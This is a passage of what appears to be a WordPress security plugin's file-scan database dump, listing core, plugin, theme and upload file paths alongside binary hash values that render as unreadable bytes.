a.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�Lѩ�zA���?�\"','������ebX|\"�\'�N�M}6���:�9��.U�','',0,'?'),('a(�\0�\'~��u����W','wp-content/plugins/wordpress-seo/images/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EЛ��O0��c���Ag3','�� 蚠{�c�FJ�w��!}a���9�','',0,'?'),('a)�TMW�Oo��Q�|�','wp-admin/images/media-button.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6@p�z^ye��','_\Z���SjזY ����V�Z��Gen�_','',0,'?'),('a\\c,I\"5T��#̋�','wp-admin/images/media-button-music.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4^&$o��uf&�','�wWd¼8P�F6�A����ܴ�to-��X\\��a$','',0,'?'),('a�w�U��\ZTz�K�','wp-includes/blocks/post-excerpt/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��)\0Ь�/o','F�+h���p��a�qÉ�Fb�A�3i�<��','',0,'?'),('a�?��_�ˢ��6j��X','readme.html',0,'\\_����A3�v�AEy�[','\\_����A3�v�AEy�[','\'1\'��Q} $��v^���[oyTG�I7Hg��','',0,'?'),('a��x�nN��mb� ','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-site-name.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ع+�C�D�C','C��w��(�ׇZ�ϲ�\\�l��+�\"X�V��','',0,'?'),('a�J��r���&�-D�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��o��}S}���8.','�$��s�����?;f�Ġ=`\r� ��&��!','',0,'?'),('a����(m�EB�l�','wp-includes/media-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P?�)S�͠�Y��;�','|p��!NR�o�*mc�>�8��t���f5-\Z;m6','',0,'?'),('a�c�CH\r��=l@ĸ','wp-admin/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�D���w�o��}�D',' e�S�\nyp|Y��*h�.���ѽ�ʆX','',0,'?'),('a�~*k`D�np�}��f','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a2�����i:@<�0e�',',�f�^ayZVZ�}m�/���PAL+���S','',0,'?'),('a�0�}�踀�@���~','wp-content/themes/twentytwentyone/template-parts/footer/footer-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fB��RJ���z�L���','�b\n=W��p�����=����3���9�\"֗;','',0,'?'),('a�ai�G����}��\Z �','wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8 *�GPU.B��l�B','D�K�r#�,COx�����*,2A<�>B�6SH','',0,'?'),('a�&S���T�\"�l�9','wp-content/plugins/wp-cerber/assets/inspector.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zn�d���*k��P�j','� �o���7Xv�o\ZC�D�j����p��','',0,'?'),('a�XʤG\'ɀn\r|t�N','wp-content/plugins/wordpress-seo/src/wrappers/wp-query-wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��}xg�_,gYF1\n','� \0=�HH��f�����q}g�1�q2_����0','',0,'?'),('a��-�b��$G�Ι','wp-content/plugins/wp-cerber/assets/flags/sh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�{ͤ�:u�d�','�R<,l��I@�X�ߠ.#pF�g�%1O���6�','',0,'?'),('b�&ga\0���o��','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Mono_500.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x��E@_*Fr�b-�w�','�=3�)n��r��l\\!H�0\0�Q���\'���w^','',0,'?'),('b�;�F��(���mV','wp-content/uploads/2019/09/water-sustainability-768x502.jpg',0,'q�f���f�i��H�','q�f���f�i��H�','�g����28�*�L^�҇>�G��F�f','',0,'?'),('bc�W@ɉ�+_���','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Container.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?��U�E>A��n','%��7�Y(-��F�SMY�E�?���,��Ҩ�','',0,'?'),('b\"^c�.V(�z���q','wp-content/plugins/redirection/locale/redirection-es_MX.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^}�)6���J�b','�����Tws���_u=ɒ�\rϴ���nR���I2','',0,'?'),('b+� �ij��3�w�I','wp-content/plugins/wordpress-seo/languages/wordpress-seo-nl_BE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','һ�����0,�حm���','rÞ&ў?mX���x#~�ט�5I��F�','',0,'?'),('bUND>�k���Gȸ��W','wp-content/plugins/wordpress-seo/inc/class-post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�.�l�5yi�','���;�H��;o*�̖P�lR�yR��1q','',0,'?'),('bY�,��ϥY�r�;�','wp-includes/js/crop/cropper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ky5�ni*M(��','�ٸ�T��ޝO���wL��y=}�gTl������','',0,'?'),('b_y\r���\Z�s�^���','wp-content/uploads/2016/11/kitchen-2486092_960_720-300x250.jpg',0,'��w�:����h+�','��w�:����h+�','��ƛ��;s�5�HU龃���%� *����','',0,'?'),('b`o��R��� :_�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-pt_BR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4���>*oڎ�H.�� ','qf.�L|�� �{�Zx\\�l$�6��d<#a�','',0,'?'),('bdB��դ��Z�O�','wp-content/plugins/redirection/database/schema/410.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e^��&Q�C�O�','o�\"��+���?l��B��WSypۢ�X��e�l','',0,'?'),('b���9���GQE��ґ','wp-content/plugins/wp-cerber/assets/flags/lv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.���JqW6A���`>','�\0���jn!-xv��+u�j��D���<�7!�5�#','',0,'?'),('b���.ӛ����','wp-content/plugins/wp-cerber/assets/flags/om.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r]-�K��K<ݳ�8�','�;�8K�KI�k�O�[��\0v�U[JR$ ��','',0,'?'),('b�E�#�vX�9Ư,','wp-content/plugins/wordpress-seo/images/error-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+9�U;1p�Ŀkt�[','�Zrg���6���J��v`�<�cěb���&','',0,'?'),('b��HV��mA �Mh�\"�','wp-content/themes/twentytwenty/assets/images/2020-square-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܴ���6T�k�x','�L�w%���7�M��ȴ�x� � >��?\\�','',0,'?'),('b���y�Ekֽ��','wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��6��U)�<�c',',���$�u;�鰮9C��W���y����ޖ','',0,'?'),('b�m���.���E�~6��','wp-content/plugins/wordpress-seo/js/dist/react-select-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|y���*�:Ft�C','���d]A&T���=C�e�3��#ȕ\\�y.v','',0,'?'),('b���HzfW����gw�','wp-content/plugins/wordfence/lib/wfSchema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�@���� �|���O�','g�v����K%��oiS�7�.�]�siH��2:p','',0,'?'),('bھ9Z��G9�5p�','wp-content/uploads/2019/08/The-best-way-to-choose-an-electrician-350x220.jpg',0,'��{A��]]�I?&���','��{A��]]�I?&���','Gq�Y�X�g��Qi�gg�K����cVj','',0,'?'),('b�\r#9��a�$�wn��','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-squirrly.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��|a*�e��3�_','WCA�@�?�u2,�S�*(mR���]|5���','',0,'?'),('b���Ҍ &�?�{','wp-includes/js/customize-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����#�5&*�o�','�<ş;\r#8�+=dK���F�S)8�׆>]�','',0,'?'),('b�+ƴݟ�3�','wp-includes/customize/class-wp-customize-nav-menu-location-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U!��s^�7�L',';��lϓ�b^�����0�(�@�L�#B��','',0,'?'),('bK�+x����wF','wp-admin/css/site-health.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$f�*������@�Y','�㰳\\0�|V�FQT�_J��K�k:G���Vǚ���','',0,'?'),('c餟��(Ok1�!͂','wp-admin/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9��Gq������','�j\Z%x�B�]{Lּ]*���ļ1IC;.�6�V','',0,'?'),('c�n1�.ꛒ�Ę:','wp-content/plugins/wordpress-seo/languages/yoast-components-fi.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PQ6\ZO������','�q5�\Z|P�+wSfQ/�b�v�\n- v�~p','',0,'?'),('c�.�K-��k3��d�','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���QOk�����','n[~՚Z�]a�h�B�_]=�@h�>�Vn�','',0,'?'),('c�4L]�˞��Mc','wp-admin/includes/class-wp-post-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@d�B��#�&&��','{��bk��\r���}� {=��\\�=6�`l�� ','',0,'?'),('c���p �PU3/�','wp-content/plugins/wordfence/modules/login-security/classes/model/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&ܮM���,~/���r','F;���W]��&��z~o\'�/��q�+��','',0,'?'),('c%�;8�QVWƝdȇ�:','wp-includes/blocks/paragraph/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e|�LO4��a$QDo��','��W� +�b���N��ܶ��\\�S�u(}��','',0,'?'),('c+=�υ��E���e','wp-content/plugins/redirection/locale/json/redirection-en_ZA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�u�I�\\� ɮ�s','19��Qs���&�l�ƨ.�*�\rn�>��0���','',0,'?'),('c,���[xޫ�3�\n�@','wp-includes/js/jquery/jquery.masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@`���&n|�}A��','�\\ۙ���� }M�g� �$�0� [���B','',0,'?'),('c42j���x�c��d','wp-includes/Requests/Session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�|;��UE�*��{Y','��^��� nt�\"V8�M@�H؟Q��[S$','',0,'?'),('ct�ש�X�پ�u�yv','wp-includes/blocks/image/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ]�4:@���<1}8','�#�eb[Q�|�hd��4=�!�5F��ʗ','',0,'?'),('c��E�cc�/2��F','wp-content/plugins/wp-cerber/assets/flags/ba.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S߫��ܟ�]�A;\Z���','\Z2��u2S��9{��Ө�G�D�+�����1�','',0,'?'),('c�Q��i�����Qv','wp-includes/css/dist/editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S����_lRUr','�z94���d�¼��[m�g�A�V�5�D�','',0,'?'),('c�r��]������.�','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-es_VE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q���0�Q�!+#EX%','�c\\�A�<\0ƹz�n!b��qk}DVk|�7�','',0,'?'),('c��k���AH�dryyK','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4<�j�B?7tKV��l','Ñ�X��t�)�{%W�╨�p�%��`͎q%�','',0,'?'),('c�r��9���V�Uo;','wp-content/uploads/2019/08/homeimprovements-768x512.jpg',0,'�� ,\0��~���\\�','�� ,\0��~���\\�','hژf�M�K�*\Z�U�\"��]Pê��5x','',0,'?'),('cЯ;��;���;:ņ�','wp-content/uploads/2019/10/plumbing3-300x250.jpg',0,'����}o�h���\' �qg','����}o�h���\' �qg','��c!����:̮��4�t��}qN���','',0,'?'),('c��z8��5Y���','wp-content/plugins/wp-cerber/assets/flags/pr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����M�_6�p�tz','n��S�X��\Z�h�m2��9��q���\Z�Z','',0,'?'),('c�_,\"�B)���1�','wp-content/plugins/wordpress-seo/admin/config-ui/components/interface-component.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\rՃ�w�w0|�;+79',')��;H)يY��\r\"w�<�i����95�Ԑ7','',0,'?'),('c�c������gu���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('c��[b]��ݽ�JF','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I]�U�� X�g����','�T�Ϛ-�1 [�@./i�i��q��0�o','',0,'?'),('d��:w���O�І','wp-includes/ID3/getid3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!N\0�[�5�իk@0','B�#����L�fW������>2�nT����','',0,'?'),('d��1�쵓-�;O��','wp-admin/js/custom-background.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�A3�� K�}Û�$','4hN\n��:Q�qX�z!���iq�^sYĄ�,i�','',0,'?'),('dF=���j��Hc�����','wp-content/plugins/akismet/wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]x�\"�Y�����KJ','\Z�Ia�^���iJ��H�:�j�:���b��','',0,'?'),('d���26��� �_��L�','wp-content/languages/en_GB-947c76bb5095da30e16668eec15406b2.json',0,'NP3˿�k ��A@_ia','NP3˿�k ��A@_ia','�����7��T��,l\0�,�WǐGnA��N�p�','',0,'?'),('d�k�JQAw6im<B1','wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�Z�vϰ�^��s��#','��)�@��ƍ�|�+�T�к�j�^!9�/QS','',0,'?'),('d���Auh��041�','wp-includes/blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�Պ�D��F�(','��\nF��|�ӹ�Z�ZC�c� �n���','',0,'?'),('d�K�/��\\�F��>7�','wp-content/plugins/redirection/locale/redirection-hr.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Sr����]���S�','�����yWp��A�\r����/M���ù`�CVi��','',0,'?'),('d�g�!č�F���\\�mB','wp-content/plugins/wp-cerber/assets/fonts/cerber.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�TϦ)��fH@^','����V�r:z��/*��I��vG��g�X','',0,'?'),('d�U��|7�Ѩ-J�ڮ','wp-content/uploads/2019/10/plumbing2-350x220.jpg',0,'�2嬹���VQK�ל%V','�2嬹���VQK�ל%V','kL�Q��b��4Ū7�7|=l��c���Y(��6','',0,'?'),('d��r�K��Q\rvKu','wp-content/uploads/2018/05/builder.jpg',0,'��(.��@-L��m�','��(.��@-L��m�','�)��-���n~�=�|�Գ9�W�����e','',0,'?'),('d�k�kF�1R�0�.','wp-content/plugins/wordpress-seo/src/actions/indexables/indexable-head-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����ǡ��~�un','����_S4�]�?v;_U�N<�2F�','',0,'?'),('d��B���9Sh7Aw\n�','wp-content/plugins/wordpress-seo/src/conditionals/primary-category-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���R��5��/�\"�','���hG�x(tʒ�\0�qG�a�E}TN8@� ','',0,'?'),('d�0�ٷ\Z�����Ԍn','wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0<N5Җo���uM','p�\"\r���<��P13�r��z���=����Ɠ]','',0,'?'),('d�(��%J��@�G�','wp-admin/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AX��������\r�','�=3wQ�=��n .A7�*�>VՈ��q�','',0,'?'),('dߚd��m��#���','wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')e��f�#�`P�~7�n','-m��z��n�N�F�E\0ѭ\\vq�sL?�Z\Z��','',0,'?'),('d��1T�g�b���!','wp-includes/blocks/query-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q0<�\0�~���3�!��','��l�╼ @�^��5�Y�)X�\04drG�<','',0,'?'),('d�hħ{q4�2�K\"�','wp-includes/SimplePie/Rating.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jkB�-\r?Q3Qw�U7','{nH�(>}Q(����a�����b�>��\n�FY+','',0,'?'),('d�4�j�2U�V��$�P','wp-admin/css/wp-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7#Q�&M?»��|�[','Q�D���6���hP���qqM9�F�O��\\O�','',0,'?'),('d�@!��d�J���','wp-includes/js/mediaelement/mejs-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.۷Z#e0�<�l���','�X�*��\Z��X�(�Z!�Ƚ��D2aB','',0,'?'),('d�|��K<c��:8�Q�','wp-content/plugins/wordpress-seo/src/integrations/third-party/exclude-woocommerce-post-types.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݐ��تz���cy�','�eٺ�-�b&3PI��~���.R�[:�����;','',0,'?'),('e\0���h�L���щ��','wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y���ѱƔUy��{�','pa����i��v��INa\'%��fE?�Mv��','',0,'?'),('e��e{��:\0�vy','wp-content/themes/twentytwentyone/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q���ɋFm��^?�','���}Q�U@xd�]n]� +hh�����D','',0,'?'),('e\r��Zf���ޞ��|�','wp-includes/js/api-request.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k#�(�ĩ����','\\���Q�M�`�$�ڣg�E�\0|�Pne�r]','',0,'?'),('e���Xnj.\\�(&�d','wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','推c�@g����h','ɿT���>�E�fg����K���� r��)�','',0,'?'),('e�P�f��o!�J�%','wp-content/plugins/wp-cerber/assets/flags/yt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��FE=�W��=�\'���','-�*U�� �K-:��햴�O��ա�3','',0,'?'),('e��(��8�����V','wp-content/plugins/wordpress-seo/vendor/yoast/i18n-module/src/i18n-v3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����~7^:�6�<V','\\Fta��P�_H<U���T�G_�o9�\Z�','',0,'?'),('e.PȴNB�Sx[�&��','wp-admin/includes/class-wp-plugin-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�T�+#}�B��^Z','���4I(q�����[�S:B�A8;�f�kRV{�','',0,'?'),('e0�8��/�;t�','wp-includes/blocks/tag-cloud/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�US�\n���H�\0 \Z�y','58��C�4;�U�{<@47EB~��G��EL�','',0,'?'),('e6�uV�@<?�wC��C','wp-content/plugins/wordpress-seo/src/helpers/wordpress-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ñ��܃����','�pj8A2�a�&�{� ����\"9|��ZX ;WV','',0,'?'),('eH-�v�&��[�L״�','wp-content/themes/vega/assets/js/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ie���[yW�~\0)a\0','#%6�Y;C���\Z�����ER�ijO�F?�}�<','',0,'?'),('eJM#�n��-\'�p�','wp-content/uploads/2019/10/plumbing2-300x200.jpg',0,'��~ޕ�A�~���\\`','��~ޕ�A�~���\\`','��\nPy\\��n���X���%\r�%ogO����','',0,'?'),('ei��y��,:���T�)','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Q�#2Џ���R���','~G)�R���7i-�#��R 9H��ǫ� b','',0,'?'),('ep\r}�u_4������','wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Щ3�^7�DPk�@c_�l','e�����נc�1��0F��^�b��B�Q@Bu��','',0,'?'),('et��=L���K�q�','wp-content/plugins/redirection/locale/redirection-it_IT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����~n�կ��^��','5��,��уV�����Ƽ��KR��V�y[XFv','',0,'?'),('euo���(���8?5','wp-includes/js/jquery/ui/menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V7g����q�ʤ','O&����x�1�,m��Q�c��YE�#RG���','',0,'?'),('e}0wTnv_�g�~','wp-content/plugins/wordfence/views/scanner/options-group-basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VE�gO�`#jV�4�C|','�s�c�� ;���*r3$X����G8ͬRK�','',0,'?'),('e�P:�߸E�jj\\3(�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-howto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�dsc��sk:K�','�����WKY�����T�3����������2�','',0,'?'),('e�щ�G�7��X�?\0B','wp-content/plugins/wordpress-seo/admin/pages/social.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A1_�S��v�K���','9 b�Ӡu�6��L&�US�b��t���نe','',0,'?'),('e�:�ą}� W���Y��','wp-content/uploads/2019/10/plumbing-300x250.jpg',0,'4��վI��t|.�','4��վI��t|.�','��iK�ߎ.J������O�9��:��9�','',0,'?'),('e��lsUO|�R}ܝ�i','wp-includes/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\r}j�NJQX]m��','ɱ��䱃Fn����2c.n�M��ڣ� A���','',0,'?'),('e��__�%��x���','wp-includes/class-snoopy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�PQ��I��P4!��','�+� ��uzR�W QW�|��5��� j[;U|�','',0,'?'),('e�^#|ۍ�TЩ��z','wp-includes/Text/Diff/Engine/xdiff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֹ�b�t�X8�GX','�[<�0�ą��aD)tJ�h�(C�[uH}sҘi�','',0,'?'),('e�l��>����L�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/LoggerTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�#�Z>B����;','��n/1��#w���22�+���U]��','',0,'?'),('e�\'���7�\r������','wp-includes/blocks/group/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Pۧ�1&���\Zѭ �','ϳ��\n9����L/Q�Qȹڢ�V��^�����','',0,'?'),('eއ��D�z\r\Z\n���)','wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�b*�\0dH��d.','Wq$!MW^f�q]]��Y/�e��>�xW3�\"ѿ','',0,'?'),('e�.�y���>���k','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-ultimate-seo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=0M�5�����i0','W=:����iT�L��7�rƆ9Go��+����','',0,'?'),('e�7�Vw��ܸ�C�','wp-content/plugins/wordpress-seo/src/surfaces/classes-surface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a�\\q0��','�Tw6��c�m{���9�����CttΧ�PHݲ','',0,'?'),('e�gXw�#&��l�l#�','wp-content/plugins/wordpress-seo/src/main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W )1|t̠]u�/�','���w�m/T���L-���7�/�W�','',0,'?'),('fH}��O=�\r���','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�!��\'���8��','�{�R]����t.y&ڵ��W.�A��Q�����','',0,'?'),('fnF�ro����:�L�','wp-content/plugins/wordpress-seo/admin/notifiers/interface-notification-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�έ��VR�`X���','���zؒ��Nu�vw�q�I�[=�R��QE','',0,'?'),('f�z�l He��x�r�','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Medium.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ދt1�FB�0�MOKQ>�','\\^/��d``�_�kf�ӑ�ހV�+��Y�D','',0,'?'),('f#��1�=z-�S�r$','wp-content/languages/en_GB-7f13c36c641b114bf18cd0bcc9ecc7e0.json',0,'�^�l��s菙�\"܃�O','�^�l��s菙�\"܃�O','���tB���ûˆ8%�GRP�M�x��A�)�Y','',0,'?'),('f>��K�kN-�l5','wp-content/plugins/wordpress-seo/languages/wordpress-seo-zh_CN.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,e\'��q��6�4C�','\rA0��J�ޕ/?��(��r�-��#a�D','',0,'?'),('fEa)riwC4X�ǚ�p','wp-content/plugins/wordpress-seo/src/helpers/site-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TK]�{@qVY��I��','�aj��M|s#�d[v��]]��\Z$�\ZҸ؟c�','',0,'?'),('fp������j�H�\'','wp-content/plugins/wordfence/views/blocking/blocking-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D��a���G]:','^Ķ�U�O�95E�ֹ�~��z��qM�q�3@','',0,'?'),('f�u3\n�M\\�}6*0�','wp-includes/class-wp-customize-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-j�b�4k2�`�s@','s\'�=*�o�[�垙B����i1�c9C�8P3�.��','',0,'?'),('f�F�A��l��Up���','wp-includes/blocks/post-featured-image/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M;� ��[���c�','ǭĔqyE��%l��\'W3�/�|ٗ2�nӐ�ϡ','',0,'?'),('f���*<�xZj����','wp-content/uploads/2019/08/Case-study.jpg',0,'fa\'I�^��@}�z','fa\'I�^��@}�z','�ev��s��%h�FGg �49@)�š@����%�','',0,'?'),('f�霰f؟|h��U�L','wp-admin/includes/ms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2�2�r����qh^','��H��\'t�r�\\\\ovV�ߖ����RJVY��p','',0,'?'),('f��ŭ�8��;�slV','wp-admin/js/privacy-tools.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����e���o`Q[�.�','��_A6���}��K�\r9�@\rro���N�\Z�','',0,'?'),('f���*pd ��\n^','wp-content/themes/twentytwentyone/template-parts/header/site-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZS��z���Cn:','��䠦c���ir���foz����1B+','',0,'?'),('f��Z#���{)�q\"�','wp-content/languages/en_GB-a25d1cc7bf7ca0b4e114f6bea64943f4.json',0,'��\n���,ػV_���7','��\n���,ػV_���7','DV�9��ƀ��4�Qw����e��X#���','',0,'?'),('f����B�D�Fr\r\r�','wp-includes/Requests/Transport/fsockopen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S�g\\\nGB�','���9�縙;�O[x`��*�8H�*r��.�P�','',0,'?'),('f�-�$��G2J�d�','wp-content/themes/twentynineteen/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$\Z%��mV=U','�x\nX�\rQ/8����Ҹ=V�d~��o;�c�Yl','',0,'?'),('f����e��R�)�','wp-includes/SimplePie/Item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-ߟ�� �8����1�V','��Q`�m{�Ҹ\n�ք=��R#�Q����\0K�','',0,'?'),('f�3��Y����T','wp-includes/js/jquery/ui/tabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�73�l��c�P���R','��{�fT�k��3Ub�� 